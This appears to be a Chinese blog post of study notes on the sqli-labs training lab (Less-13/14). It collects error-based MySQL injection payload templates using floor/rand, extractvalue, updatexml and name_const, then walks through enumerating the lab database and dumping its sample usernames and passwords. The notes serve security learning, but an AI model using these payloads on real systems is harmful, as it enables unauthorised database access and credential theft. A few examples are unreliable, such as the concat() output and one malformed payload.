之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
Sqli-labs 博客目录
盲注用到的函数
rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列
rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列
floor 向下取整 floor(2.5) == 2
count()统计元组的个数
concat() 字符串连接 concat('~~','aaa','bbb',) =>'aaa~~bbb'
concat_ws() 字符串连接 concat_ws('~~','aaa','bbb',) =>'aaa~~bbb'
extractvalue(最长32位) MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML()
updateXml(最长32位)
name_const(): mysql存储过程中的本地变量会被一个内部函数 name_const 转化,似乎是专门为存储过程设计的,没有提到有其它特别之处.
Less-13 使用 name_const() 报错注入
Less-14 使用 extractvalue() 报错注入
布尔型盲注手法,按位爆破
?id=1’and left((select version() limit 0,1),1)=’s’#
利用 floor(rand(x)*2) 的执行bug进行报错注入
?id=1” union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#
?id=1” and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)
?id=1” and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1” and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#
?id=1” and extractvalue(1,concat(0x7e,(database())))#
?id=1” and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#
利用 updatexml() 函数报错注入(有长度限制,最长32位)
?id=1” and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用 )
?id=1” union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1” and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
利用 double 数值类型超出范围进行报错注入
?id=1” union select (exp(~(select * from(select user())a))),2,3#
未测试成功
利用 bigint 溢出进行报错注入(这些溢出错误会导致MySQL版本5.5.5及以上)
基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)
未测试成功
?id=1” union select (!(select * from (select user())x) - ~0),2,3#
下面为句式:
!(select*from(select user())x)-~0
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
select ~0+!(select*from(select user())x)
一个句式组合:
(select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)
遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" union select (exp(~(select * from(select user())a))),2,3#
and so on...
测试
低版本可用,mysql 5.0可用,mysql 5.6不可用
在 username 输入 1’) order by 2# //无显示
在 password 输入 任意内容
在 username 输入 1’) order by 3# //报错
在 password 输入 任意内容
?id=1” union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1” and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
猜数据库
1’) union select 1,2 from (select name_const((select version() limit 0,1)),1),name_const((select version() limit 0,1),1))x#
1’) union select 1,2 from (select name_const((select table_schema from information_schema.tables limit 0,1),1),name_const((select table_schema from information_schema.tables limit 0,1),1))x #
1’) and exists(select * from (select * from(select name_const((select table_schema from information_schema.tables limit 0,1),1))a join(select name_const((select table_schema from information_schema.tables limit 0,1),1))b)c)#
结果显示 security
猜表名
1’) union select 1,2,3 from (select name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1),name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1))x#
1’) union select 1,2,3 from (select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1),name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))x#
1’) and exists(select * from (select * from(select name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1))a join(select name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1))b)c)#
1’) and exists(select * from (select * from(select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))a join(select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))b)c)#
结果显示 ‘emails ,referers ,uagents ,users
猜列名
1’) union select 1,2,3 from (select name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1),name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1))x#
1’) union select 1,2,3 from (select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1),name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))x#
1’) and exists(select * from (select * from(select name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’),1))a join(select name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’),1))b)c)#
1’) and exists(select * from (select * from(select name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1))a join(select name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1))b)c)#
结果为 ‘id ,username ,password ‘
猜数据
1’) union select 1,2,3 1’) union select 1,2,3 from (select name_const((select group_concat(username,0x20) from security.users),1),name_const((select group_concat(username,0x20) from security.users),1))x#
1’) and exists(select * from (select * from(select name_const((select group_concat(password,0x20) from security.users),1))a join(select name_const((select group_concat(password,0x20) from security.users),1))b)c)#
结果为
username:'Dumb ,Angelina ,Dummy ,secure ,stupid ,superman ,batman ,admin ,'
password: 'Dumb ,I-kill-you ,p@ssword ,crappy ,stupidity ,genious ,mobile ,'
测试
有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用
在 username 输入 1” order by 2#
在 username 输入 1” order by 3#
在 password 输入 任意
1” and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
猜数据库
1” and extractvalue(1,concat(0x7e,(database())))#
1” and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1)))#
结果为 security
猜表名
1” and extractvalue(1,concat(0x7e,(select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’)))#
结果为 emails ,referers ,uagents ,user
猜列名
1” and extractvalue(1,concat(0x7e,(select group_concat(column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)))#
结果为 id ,username ,password
猜数据
1” and extractvalue(1,concat(0x7e,(select group_concat(username) from security.users)))#
1” and extractvalue(1,concat(0x7e,(select group_concat(password) from security.users)))#
结果为(输出结果有长度限制)
username:Dumb,Angelina,Dummy,secure,stup
password:Dumb,I-kill-you,p@ssword,crappy